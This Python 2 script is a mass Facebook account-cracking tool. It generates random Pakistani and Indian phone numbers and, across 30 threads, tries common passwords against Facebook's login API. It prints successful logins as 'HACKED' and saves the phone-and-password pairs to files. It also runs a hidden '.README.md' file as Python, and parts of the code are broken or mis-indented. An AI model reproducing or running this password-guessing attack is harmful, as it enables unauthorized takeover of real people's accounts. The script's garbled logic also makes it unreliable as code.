import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(50000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 omi')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (iPad; U; CPU iPhone OS 5_1_1 like Mac OS X; en_US) AppleWebKit (KHTML, like Gecko) Mobile [FBAN/FBForIPhone;FBAV/4.1.1;FBBV/4110.0;FBDV/iPad2,1;FBMD/iPad;FBSN/iPhone OS;FBSV/5.1.1;FBSS/1; FBCR/;FBID/tablet;FBLC/en_US;FBSF/1.0')]
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
##exist##
def somi():
    print '[!] THANK YOU SO MUCH'
    os.sys.exit()
##Function##
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

#-Animation-#
def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
back = 0
successful = []
cpb = []
oks = []
id = []
os.system("clear")
##banner##
print """
 \033[1;91m######  ########    ###    ########  
\033[1;92m##    ##    ##      ## ##   ##     ## 
\033[1;93m##          ##     ##   ##  ##     ## 
 \033[1;94m######     ##    ##     ## ########  
 \033[1;966m     ##    ##    ######### ##   ##   
\033[1;95m##    ##    ##    ##     ## ##    ##  
\033[1;91m ######     ##    ##     ## ##     ## 

\033[1;91m########   #######  ##    ## 
\033[1;92m##     ## ##     ##  ##  ##  
\033[1;93m##     ## ##     ##   ####   
\033[1;95m########  ##     ##    ##    
\033[1;94m##     ## ##     ##    ##    
\033[1;96m##     ## ##     ##    ##    
\033[1;91m########   #######     ##    


"""
banner = """
 \033[1;91m######  ########    ###    ########  
\033[1;92m##    ##    ##      ## ##   ##     ## 
\033[1;93m##          ##     ##   ##  ##     ## 
 \033[1;94m######     ##    ##     ## ########  
 \033[1;966m     ##    ##    ######### ##   ##   
\033[1;95m##    ##    ##    ##     ## ##    ##  
\033[1;91m ######     ##    ##     ## ##     ## 

\033[1;91m########   #######  ##    ## 
\033[1;92m##     ## ##     ##  ##  ##  
\033[1;93m##     ## ##     ##   ####   
\033[1;95m########  ##     ##    ##    
\033[1;94m##     ## ##     ##    ##    
\033[1;96m##     ## ##     ##    ##    
\033[1;91m########   #######     ##    


"""
banner1 = """
 
\033[1;47m\033[1;34m           SELECT PAKISTAN SIM CODE            \033[1;0m   
\033[4;97mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m00, 01, 02, 03, 04,05, 06, 07, 08, 09,
\033[4;97mTELINORE CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;93m40, 41, 42, 43, 44,45, 46, 47 ,48 ,49,
\033[4;97mWARID CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;95m20, 21, 22, 23,24, ??, ??, ??, ?? ,??
\033[4;97mUFONE CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;94m31, 32, 33, 34,35, 36, 37, ??, ?? ,??
\033[4;97mZONG CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;92m10, 11, 12, 13,14, 15, 16, 17, ??, ??



"""
banner2 = """
\033[1;96mINDIA 905,975,755,855,954, 568
\033[1;93mINDIA 897, 967, 937, 700, 727, 965, 
\033[1;92mINDIA 786, 874, 856, 566, 590, 527, 
"""
Username = "SOMI"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;93m\033[1;47m\033[1;31m             ENTER TOOL USER NAME              \033[1;0m   \033[1;96m\n \n[\xe2\x97\x8f]ENTER  > ")
                                                                              
    if (username == Username):
    	
            print "\n\033[1;92m      [\xe2\x97\x8f] \033[1;97mCORRECT USERNAME\033[1;0m"
	    time.sleep(3)
            loop = 'false'
     

##Program##
def programer():
    os.system('clear')
    print banner
    print 47 * '-'
    print
    print
    psb('\x1b[1;91m[\x1b[1;92m01\x1b[1;91m]\x1b[1;93m PAKISTAN IDS CLONE')
    psb('\x1b[1;91m[\x1b[1;92m02\x1b[1;91m]\x1b[1;93m INDIA IDS CLONE ')
    psb('\x1b[1;91m[\x1b[1;92m00\x1b[1;91m]\x1b[1;93m CLOSE ')
    print
    print
    print 47 * '-'
    action()


def action():
    Somi = raw_input('\n\n \x1b[1;96m>   ')
    if Somi == '':
        print '[!] wrong'
        action()
    elif Somi == '1':
    	somi()
    elif Somi == '2':
    	india()
    else:
        print 'wrong'
        action()
##PAK##
def somi():
        os.system('clear')
        print 47* '\033[1;97m_'
        print banner1
        print
        try:
            c = raw_input(' ')
            k = '+923'
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
        action()
    
    xxx = str(len(id))
    psb('[\xe2\x9c\x93] \033[1;93mTOTAL NUMBERS: ' + xxx)
    time.sleep(0.5)
    psb('[\xe2\x9c\x93] \033[1;92mPLEASE WAIT, PROCESS IS START ...')
    time.sleep(0.5)
    psb('[!] \033[1;96mTO STOP THIS PROCESS PRESS Ctrl THEN Z')
    time.sleep(0.5)
    
    print
    
    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k + c + user + '|' + pass1 + '\n')
                okb.close()
                oks.append(c + user + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass1 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(k + c + user + '|' + pass1 + '\n')
                cps.close()
                cpb.append(c + user + pass1)
            else:
                pass2 =  k + c + user
                data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                q = json.load(data)
                if 'access_token' in q:
                    print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
                    okb = open('save/successfull.txt', 'a')
                    okb.write(k + c + user + '|' + pass2 + '\n')
                    okb.close()
                    oks.append(c + user + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass2 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k + c + user + '|' + pass2 + '\n')
                    cps.close()
                    cpb.append(c + user + pass2)
                else:
                    pass3 =  '786786'
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k + c + user + '|' + pass3 + '\n')
                        okb.close()
                        oks.append(c + user + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass3 + '\n'
                        cps = open('save/checkpoint.txt', 'a')
                        cps.write(k + c + user + '|' + pass3 + '\n')
                        cps.close()
                        cpb.append(c + user + pass3)
                    else:
                        pass4 =  'Pakistan'
                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                        q = json.load(data)
                        if 'access_token' in q:
                            print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
                            okb = open('save/successfull.txt', 'a')
                            okb.write(k + c + user + '|' + pass4 + '\n')
                            okb.close()
                            oks.append(c + user + pass4)
                        elif 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass4 + '\n'
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k + c + user + '|' + pass4 + '\n')
                            cps.close()
                            cpb.append(c + user + pass4)
                            
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 50 * '-'
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    os.system('python2 .README.md')
##india##
def india():
        os.system('clear')
        print 47* '\033[1;97m_'
        print banner2
        print
        try:
            c = raw_input(' ')
            k = '+91'
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
        action()
    print 47* '\033[1;97m_'
    xxx = str(len(id))
    psb('[\xe2\x9c\x93] \033[1;93mTOTAL NUMBERS: ' + xxx)
    time.sleep(0.5)
    psb('[\xe2\x9c\x93] \033[1;92mPLEASE WAIT, PROCESS IS START ...')
    time.sleep(0.5)
    psb('[!] \033[1;96mTO STOP THIS PROCESS PRESS Ctrl THEN Z')
    time.sleep(0.5)
    print 47* '\033[1;97m_'
    psb('\033[1;91m     CP ACCOUNTS OPEN AFTAR 7 DAYS')
    psb('\033[1;94m                     BEST OF LUCK    ')
    print 47* '\033[1;97m_'
    print
    
    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k + c + user + '|' + pass1 + '\n')
                okb.close()
                oks.append(c + user + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass1 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(k + c + user + '|' + pass1 + '\n')
                cps.close()
                cpb.append(c + user + pass1)
            else:
                pass2 =  k + c + user
                data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                q = json.load(data)
                if 'access_token' in q:
                    print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
                    okb = open('save/successfull.txt', 'a')
                    okb.write(k + c + user + '|' + pass2 + '\n')
                    okb.close()
                    oks.append(c + user + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass2 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k + c + user + '|' + pass2 + '\n')
                    cps.close()
                    cpb.append(c + user + pass2)
                else:
                    pass3 =  '786786'
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k + c + user + '|' + pass3 + '\n')
                        okb.close()
                        oks.append(c + user + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass3 + '\n'
                        cps = open('save/checkpoint.txt', 'a')
                        cps.write(k + c + user + '|' + pass3 + '\n')
                        cps.close()
                        cpb.append(c + user + pass3)
                    else:
                        pass4 =  '000786'
                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                        q = json.load(data)
                        if 'access_token' in q:
                            print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
                            okb = open('save/successfull.txt', 'a')
                            okb.write(k + c + user + '|' + pass4 + '\n')
                            okb.close()
                            oks.append(c + user + pass4)
                        elif 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;96m[AFTER 7DAYS] \x1b[1;95m  ' + k + c + user + '\x1b[1;94m | \x1b[1;92m' + pass4 + '\n'
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k + c + user + '|' + pass4 + '\n')
                            cps.close()
                            cpb.append(c + user + pass4)
                            
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 50 * '-'
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    os.system('python2 .README.md')


if __name__ == '__main__':
    programer()
            
